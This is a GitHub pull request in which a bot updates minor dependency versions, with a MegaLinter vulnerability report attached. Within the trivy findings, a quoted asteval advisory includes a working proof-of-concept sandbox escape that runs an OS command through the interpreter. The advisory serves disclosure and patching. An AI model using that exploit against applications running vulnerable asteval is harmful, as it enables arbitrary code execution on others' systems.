fix(deps): update all non-major dependencies#634
Open
renovate[bot] wants to merge 1 commit intomasterfrom
Open
fix(deps): update all non-major dependencies#634renovate[bot] wants to merge 1 commit intomasterfrom
renovate[bot] wants to merge 1 commit intomasterfrom
Conversation
![renovate-approve[bot]](https://avatars.githubusercontent.com/in/7394?s=60&v=4){kind=small}
![renovate-approve-2[bot]](https://avatars.githubusercontent.com/in/62175?s=60&v=4){kind=small}
✅
|
| Descriptor | Linter | Files | Fixed | Errors | Warnings | Elapsed time |
|---|---|---|---|---|---|---|
| ✅ ACTION | actionlint | 4 | 0 | 0 | 0.03s | |
| ✅ BASH | bash-exec | 4 | 0 | 0 | 0.02s | |
| ✅ BASH | shellcheck | 4 | 0 | 0 | 0.16s | |
| ✅ BASH | shfmt | 4 | 0 | 0 | 0.0s | |
| ✅ DOCKERFILE | hadolint | 1 | 0 | 0 | 1.51s | |
| ✅ EDITORCONFIG | editorconfig-checker | 50 | 0 | 0 | 0.04s | |
| ✅ JSON | jsonlint | 4 | 0 | 0 | 0.21s | |
| ✅ JSON | npm-package-json-lint | yes | no | no | 0.61s | |
| ✅ JSON | prettier | 4 | 0 | 0 | 0.62s | |
| ✅ JSON | v8r | 4 | 0 | 0 | 9.82s | |
| markdownlint | 5 | 9 | 0 | 0.77s | ||
| ✅ REPOSITORY | checkov | yes | no | no | 42.84s | |
| ✅ REPOSITORY | devskim | yes | no | no | 2.01s | |
| ✅ REPOSITORY | gitleaks | yes | no | no | 0.56s | |
| ✅ REPOSITORY | git_diff | yes | no | no | 0.03s | |
| grype | yes | 5 | 2 | 47.44s | ||
| ✅ REPOSITORY | kics | yes | no | no | 14.4s | |
| ✅ REPOSITORY | secretlint | yes | no | no | 2.26s | |
| ✅ REPOSITORY | syft | yes | no | no | 3.23s | |
| trivy | yes | 5 | 2 | 12.92s | ||
| ✅ REPOSITORY | trivy-sbom | yes | no | no | 0.75s | |
| ✅ REPOSITORY | trufflehog | yes | no | no | 3.93s |
Detailed Issues
⚠️ REPOSITORY / grype - 5 errors
warning: A medium vulnerability in github-action package: aquasecurity/trivy-action, version 0.33.1 was found at: /.github/workflows/daily-trivy-scan.yaml
error: A high vulnerability in python package: asteval, version 1.0.5 was found at: /requirements.txt
error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
warning: A medium vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
error: A high vulnerability in python package: asteval, version 1.0.5 was found at: /requirements.txt
warning: 2 warnings emitted
error: 5 errors emitted
⚠️ MARKDOWN / markdownlint - 9 errors
samples/charts/sample/README.md:5:9 MD026/no-trailing-punctuation Trailing punctuation in heading [Punctuation: ';']
samples/charts/sample/README.md:8:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm repo add chgl https://c..."]
samples/charts/sample/README.md:9:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm repo update"]
samples/charts/sample/README.md:10:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm search repo chgl/sample..."]
samples/charts/sample/README.md:11:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:28:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:40:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm uninstall sample -n sam..."]
samples/charts/sample/README.md:90:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:97:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
⚠️ REPOSITORY / trivy - 5 errors
error: Package: asteval
Installed Version: 1.0.5
Vulnerability CVE-2025-24359
Severity: HIGH
Fixed Version: 1.0.6
Link: [CVE-2025-24359](https://avd.aquasec.com/nvd/cve-2025-24359)
┌─ requirements.txt:149:1
│
149 │ asteval==1.0.5 \
│ ^
│
= ASTEVAL is an evaluator of Python expressions and statements. Prior to ...
= ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue.
error: Package: asteval
Installed Version: 1.0.5
Vulnerability GHSA-vp47-9734-prjw
Severity: HIGH
Fixed Version: 1.0.6
Link: [GHSA-vp47-9734-prjw](https://github.com/advisories/GHSA-vp47-9734-prjw)
┌─ requirements.txt:149:1
│
149 │ asteval==1.0.5 \
│ ^
│
= ASTEVAL Allows Malicious Tampering of Exposed AST Nodes Leads to Sandbox Escape
= ### Summary
If an attacker can control the input to the asteval library, they can bypass its safety restrictions and execute arbitrary Python code within the application's context.
### Details
The vulnerability is rooted in how `asteval` performs attribute access verification. In particular, the [`on_attribute`](https://github.com/lmfit/asteval/blob/8d7326df8015cf6a57506b1c2c167a1c3763e090/asteval/asteval.py#L565) node handler prevents access to attributes that are either present in the `UNSAFE_ATTRS` list or are formed by names starting and ending with `__`, as shown in the code snippet below:
```py
def on_attribute(self, node): # ('value', 'attr', 'ctx')
"""Extract attribute."""
ctx = node.ctx.__class__
if ctx == ast.Store:
msg = "attribute for storage: shouldn't be here!"
self.raise_exception(node, exc=RuntimeError, msg=msg)
sym = self.run(node.value)
if ctx == ast.Del:
return delattr(sym, node.attr)
#
unsafe = (node.attr in UNSAFE_ATTRS or
(node.attr.startswith('__') and node.attr.endswith('__')))
if not unsafe:
for dtype, attrlist in UNSAFE_ATTRS_DTYPES.items():
unsafe = isinstance(sym, dtype) and node.attr in attrlist
if unsafe:
break
if unsafe:
msg = f"no safe attribute '{node.attr}' for {repr(sym)}"
self.raise_exception(node, exc=AttributeError, msg=msg)
else:
try:
return getattr(sym, node.attr)
except AttributeError:
pass
```
While this check is intended to block access to sensitive Python dunder methods (such as `__getattribute__`), the flaw arises because instances of the `Procedure` class expose their AST (stored in the `body` attribute) without proper protection:
```py
class Procedure:
"""Procedure: user-defined function for asteval.
This stores the parsed ast nodes as from the 'functiondef' ast node
for later evaluation.
"""
def __init__(self, name, interp, doc=None, lineno=0,
body=None, args=None, kwargs=None,
vararg=None, varkws=None):
"""TODO: docstring in public method."""
self.__ininit__ = True
self.name = name
self.__name__ = self.name
self.__asteval__ = interp
self.raise_exc = self.__asteval__.raise_exception
self.__doc__ = doc
self.body = body
self.argnames = args
self.kwargs = kwargs
self.vararg = vararg
self.varkws = varkws
self.lineno = lineno
self.__ininit__ = False
```
Since the `body` attribute is not protected by a naming convention that would restrict its modification, an attacker can modify the AST of a `Procedure` during runtime to leverage unintended behaviour.
The exploit works as follows:
1. **The Time of Check, Time of Use (TOCTOU) Gadget:**
In the [code](https://github.com/lmfit/asteval/blob/8d7326df8015cf6a57506b1c2c167a1c3763e090/asteval/asteval.py#L577) below, a variable named `unsafe` is set based on whether `node.attr` is considered unsafe:
```python
unsafe = (node.attr in UNSAFE_ATTRS or
(node.attr.startswith('__') and node.attr.endswith('__')))
```
2. **Exploiting the TOCTOU Gadget:**
An attacker can abuse this gadget by hooking any `Attribute` AST node that is not in the `UNSAFE_ATTRS` list. The attacker modifies the `node.attr.startswith` function so that it points to a custom procedure. This custom procedure performs the following steps:
- It replaces the value of `node.attr` with the string `"__getattribute__"` and returns `False`.
- Thus, when `node.attr.startswith('__')` is evaluated, it returns `False`, which causes the condition to short-circuit and sets `unsafe` to `False`.
- However, by that time, `node.attr` has been changed to `"__getattribute__"`, which will be used in the subsequent `getattr(sym, node.attr)` call. An attacker can then use the obtained reference to `sym.__getattr__`to retrieve malicious attributes without needing to pass the `on_attribute` checks.
### PoC
The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:
```py
from asteval import Interpreter
aeval = Interpreter()
code = """
ga_str = "__getattribute__"
def lender():
a
b
def pwn():
ga = lender.dontcare
init = ga("__init__")
ga = init.dontcare
globals = ga("__globals__")
builtins = globals["__builtins__"]
importer = builtins["__import__"]
importer("os").system("whoami")
def startswith1(str):
# Replace the attr on the targeted AST node with "__getattribute__"
pwn.body[0].value.attr = ga_str
return False
def startswith2(str):
pwn.body[2].value.attr = ga_str
return False
n1 = lender.body[0]
n1.startswith = startswith1
pwn.body[0].value.attr = n1
n2 = lender.body[1]
n2.startswith = startswith2
pwn.body[2].value.attr = n2
pwn()
"""
aeval(code)
```
error: Package: urllib3
Installed Version: 1.26.20
Vulnerability CVE-2025-66418
Severity: HIGH
Fixed Version: 2.6.0
Link: [CVE-2025-66418](https://avd.aquasec.com/nvd/cve-2025-66418)
┌─ requirements.txt:1700:1
│
1700 │ urllib3==1.26.20 \
│ ^
│
= urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion
= urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. This vulnerability is fixed in 2.6.0.
error: Package: urllib3
Installed Version: 1.26.20
Vulnerability CVE-2025-66471
Severity: HIGH
Fixed Version: 2.6.0
Link: [CVE-2025-66471](https://avd.aquasec.com/nvd/cve-2025-66471)
┌─ requirements.txt:1700:1
│
1700 │ urllib3==1.26.20 \
│ ^
│
= urllib3: urllib3 Streaming API improperly handles highly compressed data
= urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.0 and prior to 2.6.0, the Streaming API improperly handles highly compressed data. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data.
error: Package: urllib3
Installed Version: 1.26.20
Vulnerability CVE-2026-21441
Severity: HIGH
Fixed Version: 2.6.3
Link: [CVE-2026-21441](https://avd.aquasec.com/nvd/cve-2026-21441)
┌─ requirements.txt:1700:1
│
1700 │ urllib3==1.26.20 \
│ ^
│
= urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (streaming API)
= urllib3 is an HTTP client library for Python. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted source.
warning: Package: urllib3
Installed Version: 1.26.20
Vulnerability CVE-2025-50181
Severity: MEDIUM
Fixed Version: 2.5.0
Link: [CVE-2025-50181](https://avd.aquasec.com/nvd/cve-2025-50181)
┌─ requirements.txt:1700:1
│
1700 │ urllib3==1.26.20 \
│ ^
│
= urllib3: urllib3 redirects are not disabled when retries are disabled on PoolManager instantiation
= urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disable redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.
warning: Artifact: samples/charts/sample/templates/deployment.yaml
Type: helm
Vulnerability KSV0125
Severity: MEDIUM
Message: Container sample in deployment sample (namespace: default) uses an image from an untrusted registry.
Link: [KSV0125](https://avd.aquasec.com/misconfig/ksv0125)
┌─ samples/charts/sample/templates/deployment.yaml:40:1
│
40 │ - name: {{ .Chart.Name }}
│ ^
│
= Restrict container images to trusted registries
= Ensure that all containers use images only from trusted registry domains.
warning: 2 warnings emitted
error: 5 errors emitted
See detailed reports in MegaLinter artifacts
You could have the same capabilities but better runtime performances if you use a MegaLinter flavor:
- oxsecurity/megalinter/flavors/cupcake@v9.2.0 (88 linters)
Your project could benefit from a custom flavor, which would allow you to run only the linters you need, and thus improve runtime performances. (Skip this info by defining FLAVOR_SUGGESTIONS: false)
- Documentation: Custom Flavors
- Command:
npx mega-linter-runner@9.2.0 --custom-flavor-setup --custom-flavor-linters ACTION_ACTIONLINT,BASH_EXEC,BASH_SHELLCHECK,BASH_SHFMT,DOCKERFILE_HADOLINT,EDITORCONFIG_EDITORCONFIG_CHECKER,JSON_JSONLINT,JSON_V8R,JSON_PRETTIER,JSON_NPM_PACKAGE_JSON_LINT,MARKDOWN_MARKDOWNLINT,REPOSITORY_CHECKOV,REPOSITORY_DEVSKIM,REPOSITORY_GIT_DIFF,REPOSITORY_GITLEAKS,REPOSITORY_GRYPE,REPOSITORY_KICS,REPOSITORY_SECRETLINT,REPOSITORY_SYFT,REPOSITORY_TRIVY,REPOSITORY_TRIVY_SBOM,REPOSITORY_TRUFFLEHOG
renovate
bot
dismissed stale reviews from renovate-approve[bot] and renovate-approve-2[bot]
via
920606c
renovate
bot
force-pushed
the
renovate/all-minor-patch
branch
from
0b9906f to
920606c
Compare
renovate
bot
dismissed stale reviews from renovate-approve[bot] and renovate-approve-2[bot]
via
7bcf7ba
renovate
bot
force-pushed
the
renovate/all-minor-patch
branch
from
eace33a to
7bcf7ba
Compare
renovate
bot
changed the title
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
3.11.10→3.11.115.22.7→5.23.010.1.4→10.1.50.69.1→0.69.3v1.35.1→v1.35.20.20.7→0.21.21.17.0→1.17.10.47.0→0.48.03.0.4→3.0.5Release Notes
FairwindsOps/nova (FairwindsOps/nova)
v3.11.11Compare Source
Changelog
1390f2fBump libs for nova (#429)dbb3323INS-1830: Bump libs and fix vulnerabilities (#422)af994fcINS-1952: Go 1.26 and libs bump for nova (#423)FairwindsOps/pluto (FairwindsOps/pluto)
v5.23.0Compare Source
Changelog
46b3b71feat: update versions list for 1.33-35 (#590)You can verify the signatures of both the checksums.txt file and the published docker images using cosign.
v5.22.8Compare Source
Changelog
6b3a113INS-1951: Go 1.26 and libs bump for pluto (#588)594311fINS-1832: Bump libs and fix vulnerabilities (#587)You can verify the signatures of both the checksums.txt file and the published docker images using cosign.
FairwindsOps/polaris (FairwindsOps/polaris)
v10.1.5Compare Source
Changelog
f6eed65Go 1.26a5af7bbINS-1950: Go 1.26 and bump libs for polaris (#1172)893e5deRevert "Go 1.26"You can verify the signature of the checksums.txt file using cosign.
aquasecurity/trivy (aquasecurity/trivy)
v0.69.3Compare Source
Changelog
6fb20c8release: v0.69.3 [release/v0.69] (#10293)dabefecfix(deps): bump github.com/go-git/go-git/v5 from 5.16.4 to 5.16.5 [backport: release/v0.69] (#10291)google/go-containerregistry (google/go-containerregistry)
v0.21.2Compare Source
What's Changed
Full Changelog: google/go-containerregistry@v0.21.1...v0.21.2
v0.21.1Compare Source
This release fixes a regression in
craneintroduced in the previous release.What's Changed
New Contributors
Full Changelog: google/go-containerregistry@v0.21.0...v0.21.1
v0.21.0Compare Source
This release updates the minimum Go version to
1.25.6.What's Changed
New Contributors
Full Changelog: google/go-containerregistry@v0.20.7...v0.21.0
kyverno/kyverno (kyverno/kyverno)
v1.17.1Compare Source
What's Changed
Full Changelog: kyverno/kyverno@v1.17.0...v1.17.1
igorshubovych/markdownlint-cli (markdownlint-cli)
v0.48.0Compare Source
Dependabotsigstore/cosign (sigstore/cosign)
v3.0.5Compare Source
Deprecations
Features
Bug Fixes
Documentation
Configuration
📅 Schedule: Branch creation - Between 12:00 AM and 03:59 AM, only on Monday ( * 0-3 * * 1 ) (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Enabled.
♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
This PR was generated by Mend Renovate. View the repository job log.